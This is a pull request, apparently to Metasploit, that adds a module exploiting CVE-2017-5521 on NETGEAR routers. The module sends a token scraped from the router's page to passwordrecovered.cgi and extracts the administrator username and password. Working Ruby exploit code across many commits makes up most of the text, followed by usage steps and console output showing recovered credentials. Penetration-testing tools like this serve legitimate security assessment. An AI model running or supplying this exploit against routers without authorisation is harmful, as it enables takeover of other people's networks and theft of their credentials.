### PR TITLE
Add NETGEAR admin password disclosure module

### DIFF
--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -1,0 +1,118 @@
+# -*- coding: binary -*-
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'NETGEAR Administrator Password Disclosure',
+      'Description'    => %q{
+        This module will collect the the password for the `admin` user.
+        The exploit will not complete if password recovery is set on the router.
+        The password is recieved by passing the token generated from `unauth.cgi`
+        to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
+        products. The full list of affected productsis available here:
+        http://pastebin.com/dB4bTgxz
+      },
+      'Author'         =>
+        [
+          'Simon Kenin', # Vuln Discovery, PoC
+          'thecarterb'   # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-5521' ],
+          [ 'URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911' ],
+          [ 'URL', 'http://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],
+          [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/'],
+          [ 'EDB', '41205']
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+    [
+      OptPort::new('RPORT', [true, 'The port to connect to RHOST with', 80]),
+      OptString::new('RHOST', [true, 'The router target ip address', nil])
+    ], self.class)
+  end
+
+  # @return substring of 'text', usually a response from a server in this case
+  def scrape(text, start_trig, end_trig)
+    return text[/#{start_trig}(.*?)#{end_trig}/m, 1]
+  end
+
+  def run
+    rhost = datastore['RHOST']
+    print_status("Checking if #{rhost} is a NETGEAR router")
+    
+    vprint_status("Sending request to http://#{rhost}/")
+
+    # will always call check no matter what
+    is_ng = check
+
+    res = send_request_raw({ 'uri' => '/'})
+
+    if is_ng == Exploit::CheckCode::Detected
+      marker_one = "id="
+      marker_two = "\""
+      token = scrape(res.to_s, marker_one, marker_two)
+      if token == nil
+        print_error("#{rhost} is not vulnerable: Token not found")
+        return
+      end
+
+      print_status("Token found: #{token}")
+      vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
+      
+      r = send_request_raw({'uri' => "/passwordrecovered.cgi?id=#{token}"})
+      vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
+
+      if r.to_s.include?('left">') != nil
+        username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td>
+			<td class=\"MNUText\" align=\"left\">", "</td>")
+        password = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Password</td>
+			<td class=\"MNUText\" align=\"left\">", "</td>")
+
+        print_good("Creds found: #{username}/#{password}")
+        
+      else 
+        print_error("#{rhost} is not vulnerable because password recovery is on.")
+      end
+    else
+      print_error("#{rhost} is not vulnerable: Not a NETGEAR device")
+      return
+    end
+  end
+
+  #Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response
+  #This checks the response dor that header.
+  def check                             #NOTE: this is working
+    res = send_request_raw({'uri'=>'/'})
+    
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out.')
+    end
+
+    data = res.to_s
+    
+    # Checks for the `WWW-Authenticate` header in the response
+    if data.include? "WWW-Authenticate"
+      marker_one = "Basic realm=\""
+      marker_two = "\""
+      model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]
+      print_good("Router is a NETGEAR router (#{model})")
+      return Exploit::CheckCode::Detected
+    else
+      print_error('Router is not a NETGEAR router')
+      return Exploit::CheckCode::Safe
+    end
+  end
+end

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -74,6 +74,9 @@ class MetasploitModule < Msf::Auxiliary
         return
       end
 
+      if token == '0'
+        print_status("If no creds are found, try the exploit again. #{rhost} returned a token of 0")
+      end
       print_status("Token found: #{token}")
       vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
 

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -68,21 +68,14 @@ class MetasploitModule < Msf::Auxiliary
         print_error("#{rhost} is not vulnerable: Token not found")
         return
       end
-
       print_status("Token found: #{token}")
       vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
-      
       r = send_request_raw({'uri' => "/passwordrecovered.cgi?id=#{token}"})
       vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
-
       if r.to_s.include?('left">') != nil
-        username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td>
-			<td class=\"MNUText\" align=\"left\">", "</td>")
-        password = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Password</td>
-			<td class=\"MNUText\" align=\"left\">", "</td>")
-
+        username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td><td class=\"MNUText\" align=\"left\">", "</td>")
+        password = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Password</td><td class=\"MNUText\" align=\"left\">", "</td>")
         print_good("Creds found: #{username}/#{password}")
-        
       else 
         print_error("#{rhost} is not vulnerable because password recovery is on.")
       end
@@ -102,7 +95,6 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     data = res.to_s
-    
     # Checks for the `WWW-Authenticate` header in the response
     if data.include? "WWW-Authenticate"
       marker_one = "Basic realm=\""

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -1,4 +1,3 @@
-# -*- coding: binary -*-
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -14,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'NETGEAR Administrator Password Disclosure',
       'Description'    => %q{
-        This module will collect the the password for the `admin` user.
+        This module will collect the password for the `admin` user.
         The exploit will not complete if password recovery is set on the router.
         The password is recieved by passing the token generated from `unauth.cgi`
         to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
@@ -46,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
 
   # @return substring of 'text', usually a response from a server in this case
   def scrape(text, start_trig, end_trig)
-    return text[/#{start_trig}(.*?)#{end_trig}/m, 1]
+    text[/#{start_trig}(.*?)#{end_trig}/m, 1]
   end
 
   def run
@@ -63,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
       marker_one = "id="
       marker_two = "\""
       token = scrape(res.to_s, marker_one, marker_two)
-      if token == nil
+      if token.nil?
         print_error("#{rhost} is not vulnerable: Token not found")
         return
       end
@@ -71,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
       vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
       r = send_request_raw({'uri' => "/passwordrecovered.cgi?id=#{token}"})
       vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
-      if r.to_s.include?('left">') != nil
+      if r.to_s.include?('left">')
         username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td><td class=\"MNUText\" align=\"left\">", "</td>")
         password = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Password</td><td class=\"MNUText\" align=\"left\">", "</td>")
         print_good("Creds found: #{username}/#{password}")
@@ -89,7 +88,7 @@ class MetasploitModule < Msf::Auxiliary
   def check                             #NOTE: this is working
     res = send_request_raw({'uri'=>'/'})
     unless res
-      fail_with(Failure::Unknown, 'Connection timed out.')
+      fail_with(Failure::Unreachable, 'Connection timed out.')
     end
 
     data = res.to_s

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
     [
       OptPort::new('RPORT', [true, 'The port to connect to RHOST with', 80]),
-      OptString::new('RHOST', [true, 'The router target ip address', nil])
+      OptString::new('RHOST', [true, 'The router target ip address', nil]),
+      OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
     ], self.class)
   end
 
@@ -50,6 +51,8 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     rhost = datastore['RHOST']
+    uri = target_uri.path
+    uri = normalize_uri(uri)
     print_status("Checking if #{rhost} is a NETGEAR router")
     vprint_status("Sending request to http://#{rhost}/")
 
@@ -73,7 +76,11 @@ class MetasploitModule < Msf::Auxiliary
       if r.to_s.include?('left">')
         username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td><td class=\"MNUText\" align=\"left\">", "</td>")
         password = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Password</td><td class=\"MNUText\" align=\"left\">", "</td>")
-        print_good("Creds found: #{username}/#{password}")
+        if username == "" || password == ""
+          print_error("No Creds found")
+        else
+          print_good("Creds found: #{username}/#{password}")
+        end
       else
         print_error("#{rhost} is not vulnerable because password recovery is on.")
       end

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
         })
 
       vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
-      
+
       html = r.get_html_document
       raw_html = html.text
 
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Auxiliary
       password = scrape(raw_html, "Router Admin Password", "You can")
       username = username.strip!
       password = password.strip!
- 
+
         if username == "" || password == ""
           print_error("No Creds found")
         else

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -60,7 +60,6 @@ class MetasploitModule < Msf::Auxiliary
     is_ng = check
 
     res = send_request_cgi({ 'uri' => uri })
-    
     if res.nil?
       print_error("#{rhost} returned an empty response.")
       return
@@ -76,7 +75,9 @@ class MetasploitModule < Msf::Auxiliary
       end
       print_status("Token found: #{token}")
       vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
-      r = send_request_cgi({'uri' => "/passwordrecovered.cgi?id=#{token}"})
+      r = send_request_cgi({
+        'uri' => "/passwordrecovered.cgi",
+        'vars_get' => "id=#{token}")
       vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
       if r.to_s.include?('left">')
         username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td><td class=\"MNUText\" align=\"left\">", "</td>")
@@ -98,7 +99,7 @@ class MetasploitModule < Msf::Auxiliary
   #Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response
   #This checks the response dor that header.
   def check                             #NOTE: this is working
-    res = send_request_raw({'uri'=>'/'})
+    res = send_request_cgi({'uri'=>'/'})
     unless res
       fail_with(Failure::Unreachable, 'Connection timed out.')
     end

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911' ],
           [ 'URL', 'http://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],
           [ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/'],
-          [ 'URL' , 'http://pastebin.com/dB4bTgxz'],
+          [ 'URL', 'http://pastebin.com/dB4bTgxz'],
           [ 'EDB', '41205']
         ],
       'License'        => MSF_LICENSE
@@ -83,9 +83,15 @@ class MetasploitModule < Msf::Auxiliary
         })
 
       vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
-      if r.to_s.include?('left">')
-        username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td><td class=\"MNUText\" align=\"left\">", "</td>")
-        password = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Password</td><td class=\"MNUText\" align=\"left\">", "</td>")
+      
+      html = r.get_html_document
+      raw_html = html.text
+
+      username = scrape(raw_html, "Router Admin Username", "Router Admin Password")
+      password = scrape(raw_html, "Router Admin Password", "You can")
+      username = username.strip!
+      password = password.strip!
+ 
         if username == "" || password == ""
           print_error("No Creds found")
         else

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Auxiliary
       password = scrape(raw_html, "Router Admin Password", "You can")
       if username.nil? || password.nil?
         return Exploit::CheckCode::Safe
-      else  
+      else
         username = username.strip!
         password = password.strip!
       end

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
       vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
       r = send_request_cgi({
         'uri' => "/passwordrecovered.cgi",
-        'vars_get' => "id=#{token}")
+        'vars_get' => "id=#{token}"})
       vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
       if r.to_s.include?('left">')
         username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td><td class=\"MNUText\" align=\"left\">", "</td>")

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -52,7 +52,6 @@ class MetasploitModule < Msf::Auxiliary
   def run
     rhost = datastore['RHOST']
     print_status("Checking if #{rhost} is a NETGEAR router")
-    
     vprint_status("Sending request to http://#{rhost}/")
 
     # will always call check no matter what
@@ -76,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
         username = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Username</td><td class=\"MNUText\" align=\"left\">", "</td>")
         password = scrape(r.to_s, "<td class=\"MNUText\" align=\"right\">Router Admin Password</td><td class=\"MNUText\" align=\"left\">", "</td>")
         print_good("Creds found: #{username}/#{password}")
-      else 
+      else
         print_error("#{rhost} is not vulnerable because password recovery is on.")
       end
     else
@@ -89,7 +88,6 @@ class MetasploitModule < Msf::Auxiliary
   #This checks the response dor that header.
   def check                             #NOTE: this is working
     res = send_request_raw({'uri'=>'/'})
-    
     unless res
       fail_with(Failure::Unknown, 'Connection timed out.')
     end

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -92,11 +92,12 @@ class MetasploitModule < Msf::Auxiliary
       username = scrape(raw_html, "Router Admin Username", "Router Admin Password")
       password = scrape(raw_html, "Router Admin Password", "You can")
       if username.nil? || password.nil?
-        return Exploit::CheckCode::Safe
-      else
-        username = username.strip!
-        password = password.strip!
+        print_error("#{rhost} returned empty credentials")
+        return
       end
+      username.strip!
+      password.strip!
+
       if username.empty? || password.empty?
         print_error("No Creds found")
       else

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -97,9 +97,6 @@ class MetasploitModule < Msf::Auxiliary
         else
           print_good("Creds found: #{username}/#{password}")
         end
-      else
-        print_error("#{rhost} is not vulnerable because password recovery is on.")
-      end
     else
       print_error("#{rhost} is not vulnerable: Not a NETGEAR device")
       return

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::Unreachable, 'Connection timed out.')
     end
 
-    if !res.to_s.nil?
+    if res.nil?
       print_error("#{rhost} returned an empty response")
       return
     else

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
       r = send_request_cgi({
         'uri' => "/passwordrecovered.cgi",
         'vars_get' => { 'id'  =>  token }
-        })
+      })
 
       vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
 
@@ -106,8 +106,8 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-  #Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response
-  #This checks the response dor that header.
+  # Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response
+  # This checks the response for that header.
   def check
 
     res = send_request_cgi({'uri'=>'/'})

--- a/modules/auxiliary/gather/netgear_password_disclosure.rb
+++ b/modules/auxiliary/gather/netgear_password_disclosure.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Auxiliary
         username = username.strip!
         password = password.strip!
       end
-      if username == "" || password == ""
+      if username.empty? || password.empty?
         print_error("No Creds found")
       else
         print_good("Creds found: #{username}/#{password}")


### PR DESCRIPTION
This module gathers the password for the admin user of many NETGEAR routers. In order to get the password, a generated token from `unauth.cgi` is passed to `passwordrecovered.cgi`, which gives the username and password. The module also gets the model of the router and tells it to the user by parsing the `WWW-Authenticate` header that almost every NETGEAR router has. A full list of affected models are listed here: http://pastebin.com/dB4bTgxz

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/gather/netgear_password_disclosure`
- [x] `set RHOST routerip`
- [x] `set VERBOSE true` (if you want)
- [x] `run`

## Example console output

```
msf > use auxiliary/gather/netgear_password_disclosure 
msf auxiliary(netgear_password_disclosure) > options

Module options (auxiliary/gather/netgear_password_disclosure):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The router target ip address
   RPORT    80               yes       The port to connect to RHOST with (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

msf auxiliary(netgear_password_disclosure) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(netgear_password_disclosure) > run

[*] Checking if 192.168.1.1 is a NETGEAR router
[+] Router is a NETGEAR router (NETGEAR R7000)
[*] Token found: 1567454696
[+] Creds found: admin/password
[*] Auxiliary module execution completed
msf auxiliary(netgear_password_disclosure) > 
```

#### References
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911
http://thehackernews.com/2017/01/Netgear-router-password-hacking.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/
https://www.exploit-db.com/exploits/41205

